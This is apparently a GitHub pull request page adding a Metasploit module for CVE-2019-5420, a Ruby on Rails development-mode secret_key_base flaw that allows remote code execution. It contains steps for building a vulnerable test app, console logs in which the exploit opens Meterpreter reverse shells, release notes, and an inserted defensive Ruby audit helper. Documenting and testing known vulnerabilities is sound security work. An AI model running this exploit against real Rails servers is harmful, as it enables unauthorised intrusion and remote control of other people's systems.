
Add CVE-2019-5420 : Ruby on Rails DoubleTap Development Mode secret_key_base Vulnerability #11779

Merged
merged 6 commits into from May 1, 2019

@wchen-r7

commented Apr 25, 2019

Background

This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails application would use its name as the secret_key_base, which can easily be extracted by visiting an invalid resource path. As a result, this allows a remote user to create and deliver a signed serialized payload, have it loaded by the application, and gain remote code execution.

Vulnerable Setup

In order to set up a vulnerable box for testing, do this on a Linux machine (such as Ubuntu), and assuming you already have rvm installed:

$ rvm gemset create test
$ rvm gemset use test
$ gem install rails -v 5.2.1
$ rails new demo

Next, cd to demo, and then modify the Gemfile like this:

$ echo "gem 'rails', '5.2.1'" >> Gemfile
$ echo "gem 'sqlite3', '~> 1.3.6', '< 1.4'" >> Gemfile
$ echo "source 'https://rubygems.org'" >> Gemfile
$ bundle

Next, add a new controller:

$ rails generate controller metasploit

And add the index method for that controller (under app/controllers/metasploit_controller.rb):

class MetasploitController < ApplicationController
  # Serve a static file from the application root so there is a valid
  # resource to hit once the route below is in place.
  def index
    render file: "#{Rails.root}/test.html"
  end
end

In the root directory, add a new test.html:

$ echo Hello World > test.html

Also, add the new route in config/routes.rb:

Rails.application.routes.draw do
  resources :metasploit
end

And finally, start the application (since no environment is specified, it runs in development mode by default):

$ rails s -b 0.0.0.0

Demo

msf5 exploit(multi/http/rails_double_tap) > check
[+] 172.16.249.141:3000 - The target is vulnerable.
msf5 exploit(multi/http/rails_double_tap) > exploit

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Attempting to retrieve the application name...
[*] The application name is: Demo
[*] Stager ready: 433 bytes
[*] Sending serialized payload to target (1250 bytes)
[*] Sending stage (985320 bytes) to 172.16.249.141
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.141:62572) at 2019-04-25 16:29:43 -0500
[+] Deleted /tmp/LsvSGK.bin
[+] Deleted /tmp/tSJfp.bin

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > pwd
/home/sinn3r/demo
meterpreter >
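As an added example (not the module's code and not from the PR), a stdlib-only Ruby audit helper that flags a secret_key_base equal to the predictable development-mode default, which is the value the module derives after recovering the application name. It assumes unpatched Rails 5.2.x derives that default as the MD5 hex digest of the application class name (e.g. Demo::Application); the sample values are constructed.

```ruby
require "digest"
require "securerandom"

# Predictable value an unpatched Rails 5.2.x app falls back to in development.
# Assumption: MD5 hex digest of the application class name, e.g. "Demo::Application".
def predictable_dev_secret(app_class_name)
  Digest::MD5.hexdigest(app_class_name)
end

# Audit a configured secret_key_base against the development-mode default and a
# minimum length. Returns :missing, :predictable, :too_short or :ok.
def audit_secret_key_base(secret, app_class_name, min_length: 64)
  return :missing if secret.nil? || secret.strip.empty?
  return :predictable if secret == predictable_dev_secret(app_class_name)
  return :too_short if secret.length < min_length
  :ok
end

# The application name leaks through development error pages (the module's
# "The application name is: Demo" step), so a defender can derive the same
# default and confirm the deployed secret is not it.
if __FILE__ == $PROGRAM_NAME
  app    = "Demo::Application"          # constructed sample, matches the demo app
  weak   = predictable_dev_secret(app)  # what dev mode would use
  strong = SecureRandom.hex(64)         # what a production deployment should use
  puts "dev default       -> #{audit_secret_key_base(weak, app)}"
  puts "random 128-hex    -> #{audit_secret_key_base(strong, app)}"
  puts "short fixed value -> #{audit_secret_key_base('changeme', app)}"
end
```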
@wchen-r7


commented Apr 30, 2019

Thank you for the feedback. I think I have addressed all the ones mentioned above. Please let me know if there's any more.

@space-r7 space-r7 self-assigned this Apr 30, 2019

@space-r7


commented May 1, 2019

Tested on v5.2.1:

msf5 > use exploit/multi/http/rails_double_tap 
msf5 exploit(multi/http/rails_double_tap) > set rhosts 192.168.37.186
rhosts => 192.168.37.186
msf5 exploit(multi/http/rails_double_tap) > check
[+] 192.168.37.186:3000 - The target is vulnerable.
msf5 exploit(multi/http/rails_double_tap) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Attempting to retrieve the application name...
[*] The application name is: Demo
[*] Stager ready: 433 bytes
[*] Sending serialized payload to target (1250 bytes)
[*] Sending stage (985320 bytes) to 192.168.37.186
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.186:43798) at 2019-05-01 08:29:51 -0500
[+] Deleted /tmp/LxcZAf.bin
[+] Deleted /tmp/xdVrO.bin

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.186
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

@space-r7 space-r7 merged commit 1fd54e2 into rapid7:master May 1, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

space-r7 added a commit that referenced this pull request May 1, 2019

msjenkins-r7 added a commit that referenced this pull request May 1, 2019

@space-r7


commented May 1, 2019

Release Notes

The multi/http/rails_double_tap exploit module has been added to the framework. This module can predict the secret_key_base of a Ruby on Rails application while it is running in development mode and use the secret_key_base to generate a serialized payload. Sending that payload back to the Rails application can then result in remote code execution. This vulnerability exists for Rails versions 5.2.2 and below.
